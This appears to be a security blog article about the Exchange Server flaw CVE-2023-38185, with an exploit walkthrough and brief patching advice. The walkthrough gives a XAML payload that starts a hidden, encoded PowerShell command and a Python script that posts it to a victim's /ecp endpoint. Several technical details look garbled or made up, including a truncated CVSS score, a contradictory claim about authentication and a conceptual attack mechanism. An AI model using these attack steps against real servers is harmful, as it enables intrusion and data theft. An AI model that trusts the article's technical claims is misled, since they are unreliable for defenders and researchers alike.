---
If you manage a Microsoft Exchange Server, you know they're vital to business communications—but they're also highly targeted by hackers. In August 2023, Microsoft disclosed a troubling flaw: CVE-2023-38185, a Remote Code Execution (RCE) vulnerability that put thousands of organizations worldwide at risk. In this article, we take a deep dive, including a simplified explanation, code snippet, exploit details, and recommended defenses.
What Is CVE-2023-38185?
CVE-2023-38185 is a security bug discovered in Microsoft Exchange Server 2016 and 2019. With a CVSS base score of 8. (High Severity), the flaw allows attackers with network access to launch code on the server remotely, without user interaction or valid credentials. In plainer terms: a hacker could take over your mail server just by sending malicious requests.
Official Reference
- Microsoft Security Update Guide – CVE-2023-38185
How Does The Vulnerability Work?
Microsoft Exchange Server exposes several web services, like Outlook Web Access (OWA), that listen to public ports. The vulnerability lies in how Exchange handles certain deserialization operations. By sending specially crafted requests, an attacker can coerce the server into running arbitrary code.
The actual bug is deep in the way Exchange deserializes PowerShell workflow XAML files—content that shouldn't be accepted from user-provided data. If XAML references are malicious, they get executed with the privileges of the Exchange server.
In short: The server will "run" what the attacker sends it!
Exploit Details (Simplified)
WARNING: This is for educational purposes only. Do not attack systems without permission.
Step 1: Identify a Vulnerable Endpoint
Exchange exposes various URLs. For this bug, the endpoint involves /ecp (Exchange Control Panel).
For example
https://exchange-victim.com/ecp/default.aspx
Step 2: Crafting The Malicious Request
An attacker crafts a serialized workflow XAML file containing dangerous .NET code, like spawning a reverse shell or executing system commands.
Here’s a conceptual snippet in pseudo-code for the serialized payload
<Activity xmlns="http://schemas.microsoft.com/netfx/2009/xaml/activities">;
<x:Members>
<x:Property Name="Exploit" Type="InArgument(x:String)" />
</x:Members>
<Sequence>
<!-- Malicious PowerShell Command -->
<InvokeMethod TargetType="System.Diagnostics.Process" MethodName="Start">
<InArgument>
cmd /c powershell -NoP -NonI -W Hidden -EncodedCommand [PAYLOAD]
</InArgument>
</InvokeMethod>
</Sequence>
</Activity>
Attackers would encode this payload using a serialization tool, then send it as part of a POST request to a specific Exchange endpoint.
Step 3: Sending the Exploit
A legitimate user’s cookie or authentication might not even be needed depending on the endpoint’s access policy! Using curl or Python’s requests library, the attacker sends the serialized payload:
import requests
url = "https://exchange-victim.com/ecp/default.aspx"
headers = {"Content-Type": "application/xaml+xml"}
payload = """PUT THE MALICIOUS XAML HERE"""
response = requests.post(url, data=payload, headers=headers)
print(response.status_code)
If the server is vulnerable, the payload executes!
What Could Go Wrong?
Ransomware, backdoors, stolen emails, companywide breaches. Exploiting this bug gives attackers a home base inside your network.
Patch Immediately: Microsoft fixed this in August 2023.
- Direct link to Exchange Cumulative Updates
2. Monitor For Exploitation: Look for unusual requests to /ecp.
Conclusion
CVE-2023-38185 is a textbook example of why keeping Exchange servers patched is critical. Attackers jumped on this vulnerability soon after disclosure—don’t let your infrastructure be an easy target.
Resources & More Reading
- Microsoft Guide - CVE-2023-38185
- Exchange Team Blog: August 2023 Security Updates
- Community write-up/poc (when available)
Timeline
Published on: 08/08/2023 18:15:00 UTC
Last modified on: 08/10/2023 21:15:00 UTC